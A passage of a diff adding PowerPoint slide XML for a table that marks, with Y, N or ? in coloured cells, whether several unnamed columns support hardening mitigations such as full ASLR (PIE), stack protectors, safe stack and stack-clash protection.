+                          <a:spcPts val="0"/>
+                        </a:spcBef>
+                        <a:spcAft>
+                          <a:spcPts val="0"/>
+                        </a:spcAft>
+                        <a:buClrTx/>
+                        <a:buSzTx/>
+                        <a:buFontTx/>
+                        <a:buNone/>
+                        <a:tabLst/>
+                        <a:defRPr/>
+                      </a:pPr>
+                      <a:r>
+                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
+                        <a:t>Y</a:t>
+                      </a:r>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr">
+                    <a:solidFill>
+                      <a:schemeClr val="accent6"/>
+                    </a:solidFill>
+                  </a:tcPr>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
+                        <a:lnSpc>
+                          <a:spcPct val="100000"/>
+                        </a:lnSpc>
+                        <a:spcBef>
+                          <a:spcPts val="0"/>
+                        </a:spcBef>
+                        <a:spcAft>
+                          <a:spcPts val="0"/>
+                        </a:spcAft>
+                        <a:buClrTx/>
+                        <a:buSzTx/>
+                        <a:buFontTx/>
+                        <a:buNone/>
+                        <a:tabLst/>
+                        <a:defRPr/>
+                      </a:pPr>
+                      <a:r>
+                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
+                        <a:t>Y</a:t>
+                      </a:r>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr">
+                    <a:solidFill>
+                      <a:schemeClr val="accent6"/>
+                    </a:solidFill>
+                  </a:tcPr>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr algn="ctr"/>
+                      <a:r>
+                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
+                        <a:t>Y</a:t>
+                      </a:r>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr">
+                    <a:solidFill>
+                      <a:schemeClr val="accent6"/>
+                    </a:solidFill>
+                  </a:tcPr>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr algn="ctr"/>
+                      <a:r>
+                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
+                        <a:t>Y</a:t>
+                      </a:r>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr">
+                    <a:solidFill>
+                      <a:schemeClr val="accent6"/>
+                    </a:solidFill>
+                  </a:tcPr>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr algn="ctr"/>
+                      <a:r>
+                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
+                        <a:t>Y</a:t>
+                      </a:r>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr">
+                    <a:solidFill>
+                      <a:schemeClr val="accent6"/>
+                    </a:solidFill>
+                  </a:tcPr>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr algn="ctr"/>
+                      <a:r>
+                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
+                        <a:t>Y</a:t>
+                      </a:r>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr">
+                    <a:solidFill>
+                      <a:schemeClr val="accent6"/>
+                    </a:solidFill>
+                  </a:tcPr>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr algn="ctr"/>
+                      <a:r>
+                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
+                        <a:t>Y</a:t>
+                      </a:r>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr">
+                    <a:solidFill>
+                      <a:schemeClr val="accent6"/>
+                    </a:solidFill>
+                  </a:tcPr>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr algn="ctr"/>
+                      <a:r>
+                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
+                        <a:t>Y</a:t>
+                      </a:r>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr">
+                    <a:solidFill>
+                      <a:schemeClr val="accent6"/>
+                    </a:solidFill>
+                  </a:tcPr>
+                </a:tc>
+                <a:extLst>
+                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
+                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="254780261"/>
+                  </a:ext>
+                </a:extLst>
+              </a:tr>
+              <a:tr h="360000">
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr algn="ctr"/>
+                      <a:r>
+                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
+                        <a:t>Full ASLR (PIE)</a:t>
+                      </a:r>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr"/>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
+                        <a:lnSpc>
+                          <a:spcPct val="100000"/>
+                        </a:lnSpc>
+                        <a:spcBef>
+                          <a:spcPts val="0"/>
+                        </a:spcBef>
+                        <a:spcAft>
+                          <a:spcPts val="0"/>
+                        </a:spcAft>
+                        <a:buClrTx/>
+                        <a:buSzTx/>
+                        <a:buFontTx/>
+                        <a:buNone/>
+                        <a:tabLst/>
+                        <a:defRPr/>
+                      </a:pPr>
+                      <a:r>
+                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
+                        <a:t>Y</a:t>
+                      </a:r>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr">
+                    <a:solidFill>
+                      <a:schemeClr val="accent6"/>
+                    </a:solidFill>
+                  </a:tcPr>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
+                        <a:lnSpc>
+                          <a:spcPct val="100000"/>
+                        </a:lnSpc>
+                        <a:spcBef>
+                          <a:spcPts val="0"/>
+                        </a:spcBef>
+                        <a:spcAft>
+                          <a:spcPts val="0"/>
+                        </a:spcAft>
+                        <a:buClrTx/>
+                        <a:buSzTx/>
+                        <a:buFontTx/>
+                        <a:buNone/>
+                        <a:tabLst/>
+                        <a:defRPr/>
+                      </a:pPr>
+                      <a:r>
+                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
+                        <a:t>Y</a:t>
+                      </a:r>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr">
+                    <a:solidFill>
+                      <a:schemeClr val="accent6"/>
+                    </a:solidFill>
+                  </a:tcPr>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
+                        <a:lnSpc>
+                          <a:spcPct val="100000"/>
+                        </a:lnSpc>
+                        <a:spcBef>
+                          <a:spcPts val="0"/>
+                        </a:spcBef>
+                        <a:spcAft>
+                          <a:spcPts val="0"/>
+                        </a:spcAft>
+                        <a:buClrTx/>
+                        <a:buSzTx/>
+                        <a:buFontTx/>
+                        <a:buNone/>
+                        <a:tabLst/>
+                        <a:defRPr/>
+                      </a:pPr>
+                      <a:r>
+                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
+                        <a:t>Y</a:t>
+                      </a:r>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr">
+                    <a:solidFill>
+                      <a:schemeClr val="accent6"/>
+                    </a:solidFill>
+                  </a:tcPr>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr algn="ctr"/>
+                      <a:r>
+                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
+                        <a:t>Y</a:t>
+                      </a:r>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr">
+                    <a:solidFill>
+                      <a:schemeClr val="accent6"/>
+                    </a:solidFill>
+                  </a:tcPr>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr algn="ctr"/>
+                      <a:r>
+                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
+                        <a:t>Y</a:t>
+                      </a:r>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr">
+                    <a:solidFill>
+                      <a:schemeClr val="accent6"/>
+                    </a:solidFill>
+                  </a:tcPr>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr algn="ctr"/>
+                      <a:r>
+                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
+                        <a:t>Y</a:t>
+                      </a:r>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr">
+                    <a:solidFill>
+                      <a:schemeClr val="accent6"/>
+                    </a:solidFill>
+                  </a:tcPr>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr algn="ctr"/>
+                      <a:r>
+                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
+                        <a:t>N</a:t>
+                      </a:r>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr">
+                    <a:solidFill>
+                      <a:schemeClr val="accent2"/>
+                    </a:solidFill>
+                  </a:tcPr>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr algn="ctr"/>
+                      <a:r>
+                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
+                        <a:t>N</a:t>
+                      </a:r>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr">
+                    <a:solidFill>
+                      <a:schemeClr val="accent2"/>
+                    </a:solidFill>
+                  </a:tcPr>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr algn="ctr"/>
+                      <a:r>
+                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
+                        <a:t>Y</a:t>
+                      </a:r>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr">
+                    <a:solidFill>
+                      <a:schemeClr val="accent6"/>
+                    </a:solidFill>
+                  </a:tcPr>
+                </a:tc>
+                <a:extLst>
+                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
+                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1801720213"/>
+                  </a:ext>
+                </a:extLst>
+              </a:tr>
+              <a:tr h="360000">
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr algn="ctr"/>
+                      <a:r>
+                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
+                        <a:t>Stack Protector</a:t>
+                      </a:r>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr"/>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
+                        <a:lnSpc>
+                          <a:spcPct val="100000"/>
+                        </a:lnSpc>
+                        <a:spcBef>
+                          <a:spcPts val="0"/>
+                        </a:spcBef>
+                        <a:spcAft>
+                          <a:spcPts val="0"/>
+                        </a:spcAft>
+                        <a:buClrTx/>
+                        <a:buSzTx/>
+                        <a:buFontTx/>
+                        <a:buNone/>
+                        <a:tabLst/>
+                        <a:defRPr/>
+                      </a:pPr>
+                      <a:r>
+                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
+                        <a:t>Y</a:t>
+                      </a:r>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr">
+                    <a:solidFill>
+                      <a:schemeClr val="accent6"/>
+                    </a:solidFill>
+                  </a:tcPr>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
+                        <a:lnSpc>
+                          <a:spcPct val="100000"/>
+                        </a:lnSpc>
+                        <a:spcBef>
+                          <a:spcPts val="0"/>
+                        </a:spcBef>
+                        <a:spcAft>
+                          <a:spcPts val="0"/>
+                        </a:spcAft>
+                        <a:buClrTx/>
+                        <a:buSzTx/>
+                        <a:buFontTx/>
+                        <a:buNone/>
+                        <a:tabLst/>
+                        <a:defRPr/>
+                      </a:pPr>
+                      <a:r>
+                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
+                        <a:t>N</a:t>
+                      </a:r>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr">
+                    <a:solidFill>
+                      <a:schemeClr val="accent2"/>
+                    </a:solidFill>
+                  </a:tcPr>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
+                        <a:lnSpc>
+                          <a:spcPct val="100000"/>
+                        </a:lnSpc>
+                        <a:spcBef>
+                          <a:spcPts val="0"/>
+                        </a:spcBef>
+                        <a:spcAft>
+                          <a:spcPts val="0"/>
+                        </a:spcAft>
+                        <a:buClrTx/>
+                        <a:buSzTx/>
+                        <a:buFontTx/>
+                        <a:buNone/>
+                        <a:tabLst/>
+                        <a:defRPr/>
+                      </a:pPr>
+                      <a:r>
+                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
+                        <a:t>Y</a:t>
+                      </a:r>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr">
+                    <a:solidFill>
+                      <a:schemeClr val="accent6"/>
+                    </a:solidFill>
+                  </a:tcPr>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr algn="ctr"/>
+                      <a:r>
+                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
+                        <a:t>N</a:t>
+                      </a:r>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr">
+                    <a:solidFill>
+                      <a:schemeClr val="accent2"/>
+                    </a:solidFill>
+                  </a:tcPr>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr algn="ctr"/>
+                      <a:r>
+                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
+                        <a:t>N</a:t>
+                      </a:r>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr">
+                    <a:solidFill>
+                      <a:schemeClr val="accent2"/>
+                    </a:solidFill>
+                  </a:tcPr>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr algn="ctr"/>
+                      <a:r>
+                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
+                        <a:t>Y</a:t>
+                      </a:r>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr">
+                    <a:solidFill>
+                      <a:schemeClr val="accent6"/>
+                    </a:solidFill>
+                  </a:tcPr>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr algn="ctr"/>
+                      <a:r>
+                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
+                        <a:t>N</a:t>
+                      </a:r>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr">
+                    <a:solidFill>
+                      <a:schemeClr val="accent2"/>
+                    </a:solidFill>
+                  </a:tcPr>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr algn="ctr"/>
+                      <a:r>
+                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
+                        <a:t>N</a:t>
+                      </a:r>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr">
+                    <a:solidFill>
+                      <a:schemeClr val="accent2"/>
+                    </a:solidFill>
+                  </a:tcPr>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr algn="ctr"/>
+                      <a:r>
+                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
+                        <a:t>Y</a:t>
+                      </a:r>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr">
+                    <a:solidFill>
+                      <a:schemeClr val="accent6"/>
+                    </a:solidFill>
+                  </a:tcPr>
+                </a:tc>
+                <a:extLst>
+                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
+                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1636600248"/>
+                  </a:ext>
+                </a:extLst>
+              </a:tr>
+              <a:tr h="360000">
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr algn="ctr"/>
+                      <a:r>
+                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
+                        <a:t>Safe Stack</a:t>
+                      </a:r>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr"/>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
+                        <a:lnSpc>
+                          <a:spcPct val="100000"/>
+                        </a:lnSpc>
+                        <a:spcBef>
+                          <a:spcPts val="0"/>
+                        </a:spcBef>
+                        <a:spcAft>
+                          <a:spcPts val="0"/>
+                        </a:spcAft>
+                        <a:buClrTx/>
+                        <a:buSzTx/>
+                        <a:buFontTx/>
+                        <a:buNone/>
+                        <a:tabLst/>
+                        <a:defRPr/>
+                      </a:pPr>
+                      <a:r>
+                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
+                        <a:t>N</a:t>
+                      </a:r>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr">
+                    <a:solidFill>
+                      <a:schemeClr val="accent2"/>
+                    </a:solidFill>
+                  </a:tcPr>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
+                        <a:lnSpc>
+                          <a:spcPct val="100000"/>
+                        </a:lnSpc>
+                        <a:spcBef>
+                          <a:spcPts val="0"/>
+                        </a:spcBef>
+                        <a:spcAft>
+                          <a:spcPts val="0"/>
+                        </a:spcAft>
+                        <a:buClrTx/>
+                        <a:buSzTx/>
+                        <a:buFontTx/>
+                        <a:buNone/>
+                        <a:tabLst/>
+                        <a:defRPr/>
+                      </a:pPr>
+                      <a:r>
+                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
+                        <a:t>N</a:t>
+                      </a:r>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr">
+                    <a:solidFill>
+                      <a:schemeClr val="accent2"/>
+                    </a:solidFill>
+                  </a:tcPr>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
+                        <a:lnSpc>
+                          <a:spcPct val="100000"/>
+                        </a:lnSpc>
+                        <a:spcBef>
+                          <a:spcPts val="0"/>
+                        </a:spcBef>
+                        <a:spcAft>
+                          <a:spcPts val="0"/>
+                        </a:spcAft>
+                        <a:buClrTx/>
+                        <a:buSzTx/>
+                        <a:buFontTx/>
+                        <a:buNone/>
+                        <a:tabLst/>
+                        <a:defRPr/>
+                      </a:pPr>
+                      <a:r>
+                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
+                        <a:t>?</a:t>
+                      </a:r>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr"/>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr algn="ctr"/>
+                      <a:r>
+                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
+                        <a:t>N</a:t>
+                      </a:r>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr">
+                    <a:solidFill>
+                      <a:schemeClr val="accent2"/>
+                    </a:solidFill>
+                  </a:tcPr>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr algn="ctr"/>
+                      <a:r>
+                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
+                        <a:t>N</a:t>
+                      </a:r>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr">
+                    <a:solidFill>
+                      <a:schemeClr val="accent2"/>
+                    </a:solidFill>
+                  </a:tcPr>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr algn="ctr"/>
+                      <a:r>
+                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
+                        <a:t>?</a:t>
+                      </a:r>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr"/>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr algn="ctr"/>
+                      <a:r>
+                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
+                        <a:t>N</a:t>
+                      </a:r>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr">
+                    <a:solidFill>
+                      <a:schemeClr val="accent2"/>
+                    </a:solidFill>
+                  </a:tcPr>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr algn="ctr"/>
+                      <a:r>
+                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
+                        <a:t>N</a:t>
+                      </a:r>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr">
+                    <a:solidFill>
+                      <a:schemeClr val="accent2"/>
+                    </a:solidFill>
+                  </a:tcPr>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr algn="ctr"/>
+                      <a:r>
+                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
+                        <a:t>?</a:t>
+                      </a:r>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr"/>
+                </a:tc>
+                <a:extLst>
+                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
+                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="86468879"/>
+                  </a:ext>
+                </a:extLst>
+              </a:tr>
+              <a:tr h="360000">
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr algn="ctr"/>
+                      <a:r>
+                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
+                        <a:t>Stack Clashing</a:t>
+                      </a:r>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr"/>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr algn="ctr"/>
+                      <a:r>
+                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
+                        <a:t>Y</a:t>
+                      </a:r>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr">
+                    <a:solidFill>
+                      <a:schemeClr val="accent6"/>
+                    </a:solidFill>
+                  </a:tcPr>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr algn="ctr"/>
+                      <a:r>
+                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
+                        <a:t>N</a:t>
+                      </a:r>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr">
+                    <a:solidFill>
+                      <a:schemeClr val="accent2"/>
+                    </a:solidFill>
+                  </a:tcPr>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr algn="ctr"/>
+                      <a:r>
+                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
+                        <a:t>Y</a:t>
+                      </a:r>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr">
+                    <a:solidFill>
+                      <a:schemeClr val="accent6"/>
+                    </a:solidFill>
+                  </a:tcPr>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr algn="ctr"/>
+                      <a:r>
+                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
+                        <a:t>N</a:t>
+                      </a:r>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr">
+                    <a:solidFill>
+                      <a:schemeClr val="accent2"/>
+                    </a:solidFill>
+                  </a:tcPr>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr algn="ctr"/>
+                      <a:r>
+                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
+                        <a:t>N</a:t>
+                      </a:r>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr">
+                    <a:solidFill>
+                      <a:schemeClr val="accent2"/>
+                    </a:solidFill>
+                  </a:tcPr>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr algn="ctr"/>
+                      <a:r>
+                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
+                        <a:t>Y</a:t>
+                      </a:r>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr">
+                    <a:solidFill>
+                      <a:schemeClr val="accent6"/>
+                    </a:solidFill>
+                  </a:tcPr>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr algn="ctr"/>
+                      <a:r>
+                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
+                        <a:t>N</a:t>
+                      </a:r>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr">
+                    <a:solidFill>
+                      <a:schemeClr val="accent2"/>
+                    </a:solidFill>
+                  </a:tcPr>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr algn="ctr"/>
+                      <a:r>
+                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
+                        <a:t>N</a:t>
+                      </a:r>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr">
+                    <a:solidFill>
+                      <a:schemeClr val="accent2"/>
+                    </a:solidFill>
+                  </a:tcPr>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr algn="ctr"/>
+                      <a:r>
+                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
+                        <a:t>?</a:t>
+                      </a:r>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr"/>
+                </a:tc>
+                <a:extLst>
+                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
